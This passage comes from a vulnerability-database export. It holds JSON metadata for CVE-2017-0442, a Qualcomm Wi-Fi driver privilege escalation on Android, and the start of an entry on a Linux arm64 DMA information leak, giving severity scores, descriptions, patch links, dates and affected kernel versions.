            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0442",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-01397",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0442",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0442",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01397",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-292",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0442",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0442"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0442"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32871330. References: QC-CR#1092497. Android is a Linux-based open source operating system jointly developed by Google Inc. and the Open Handheld Alliance. QualcommWi-Fidriver in Android on several Google devices has security vulnerabilities that allow remote attackers to exploit vulnerabilities to escalate permissions through special malicious applications. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0442"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0442"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0442",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96047",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-292",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0442",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0442"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0442"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ]
  },
  "id": "VAR-201702-0757",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:00:12.221000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for GoogleAndroid Qualcomm Wi-Fidriver Privilege Escalation Vulnerability (CNVD-2017-01397)",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89357"
      },
      {
        "title": "Android Qualcomm Wi-Fi Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67576"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0442"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-120",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0442"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/96047"
      },
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0442"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2017-0442"
      },
      {
        "trust": 0.3,
        "url": "http://code.google.com/android/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/120.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0442"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0442"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0442"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0442"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      },
      {
        "date": "2017-02-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0442"
      },
      {
        "date": "2017-02-07T00:00:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "date": "2017-02-08T15:59:01.737000",
        "db": "NVD",
        "id": "CVE-2017-0442"
      },
      {
        "date": "2017-02-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-02-16T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2017-01397"
      },
      {
        "date": "2019-10-03T00:00:00",
        "db": "VULMON",
        "id": "CVE-2017-0442"
      },
      {
        "date": "2017-03-07T00:02:00",
        "db": "BID",
        "id": "96047"
      },
      {
        "date": "2017-02-23T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      },
      {
        "date": "2019-10-03T00:03:26.223000",
        "db": "NVD",
        "id": "CVE-2017-0442"
      },
      {
        "date": "2019-10-23T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualcomm Wi-Fi Vulnerability that could elevate privileges in drivers",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001491"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "permissions and access control issues",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-292"
      }
    ],
    "trust": 0.6
  }
}

var-201610-0041
Vulnerability from variot

arch/arm64/mm/dma-mapping.c in the Linux kernel before 4.0.3, as used in the ION subsystem in Android and other products, does not initialize certain data structures, which allows local users to obtain sensitive information from kernel memory by triggering a dma_mmap call. Linux Kernel is prone to an information disclosure vulnerability. An attacker can exploit this issue to obtain sensitive information; information obtained may aid in other attacks

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201610-0041",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.0.2"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "4.0.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "4.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.6"
      },
      {
        "model": "p9 eva-tl10c00b192",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.80"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.76"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.73"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "kernel 3.0-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "p9 eva-tl10c00b193",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.81"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.88"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.3"
      },
      {
        "model": "p9 eva-cl10c00b193",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "p9 eva-dl10c00b192",
        "scope": null,
        "trust": 0.3,
        "vendor": "huawei",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
